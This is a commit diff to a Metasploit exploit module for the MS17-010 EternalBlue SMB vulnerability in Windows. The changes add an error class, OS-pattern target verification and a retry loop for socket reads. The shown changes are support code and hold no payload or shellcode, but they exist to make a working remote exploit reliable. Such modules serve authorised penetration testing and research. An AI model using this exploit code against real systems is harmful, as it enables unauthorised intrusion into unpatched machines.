basic OS verification, ghetto socket read code

zerosum0x0 · zerosum0x0 · commit 646ca1437528 · 2017-05-17T22:48:45.000-06:00
diff --git a/modules/exploits/windows/smb/ms17_010_eternalblue.rb b/modules/exploits/windows/smb/ms17_010_eternalblue.rb
@@ -89,6 +89,9 @@ def initialize(info = {})
       ])
   end
 
+  class EternalBlueError < StandardError
+  end
+
   def check
     # todo: create MS17-010 mixin, and hook up auxiliary/scanner/smb/smb_ms17_010
   end
@@ -121,6 +124,8 @@ def exploit
         end
       end
 
+    rescue EternalBlueError => e
+      print_bad("#{e.message}")
     rescue  ::RubySMB::Error::UnexpectedStatusCode,
             ::Errno::ECONNRESET,
             ::Rex::HostUnreachable,
@@ -149,7 +154,7 @@ def smb_eternalblue(process_name, grooms)
       print_good("Connection established for exploitation.")
 
       if not verify_target(os)
-        return
+        raise EternalBlueError, "Unable to continue with improper OS Target."
       end
 
       #if not verify_arch
@@ -203,24 +208,33 @@ def smb_eternalblue(process_name, grooms)
       # tree disconnect
       # logoff and x
       # note: these aren't necessary, just close the sockets
-
+      return true
     ensure
       abort_sockets
     end
   end
 
   def verify_target(os)
+    os = os.gsub("\x00", '')  # strip unicode bs
+    os << "\x00"              # but original has a null
     ret = true
 
     if datastore['VerifyTarget']
-      if false
-        los = os.downcase
-        #if los.include 'server 2008 r2' or os =~ /windows 7/i
+      ret = false
+      # search if its in patterns
+      target['os_patterns'].each do |pattern|
+        if os.downcase.include? pattern.downcase
+          ret = true
+          break
+        end
+      end
+
+      if ret
+        print_status("Target OS selected valid for OS indicated by SMB reply")
+      else
         print_warning("Target OS selected not valid for OS indicated by SMB reply")
         print_warning("Disable VerifyTarget option to proceed manually...")
-        ret = false
       end
-      print_status("Target OS selected valid for OS indicated by SMB reply")
     end
 
     # cool buffer print no matter what, will be helpful when people post debug issues
@@ -230,9 +244,6 @@ def verify_target(os)
   end
 
   def print_core_buffer(os)
-    os = os.gsub("\x00", '') # don't do the unicode
-    os << "\x00" # but original has a null
-
     print_status("CORE raw buffer dump (#{os.length.to_s} bytes)")
 
     count = 0
@@ -344,7 +355,14 @@ def smb1_free_hole(start)
   end
 
   def smb1_get_response(sock)
-    raw = sock.get_once
+    raw = nil
+
+    # dirty hack since it doesn't always like to reply the first time...
+    16.times do
+      raw = sock.get_once
+      break unless raw.nil? or raw.empty?
+    end
+
     response = RubySMB::SMB1::SMBHeader.read(raw[4..-1])
     code = response.nt_status
     return code, raw, response
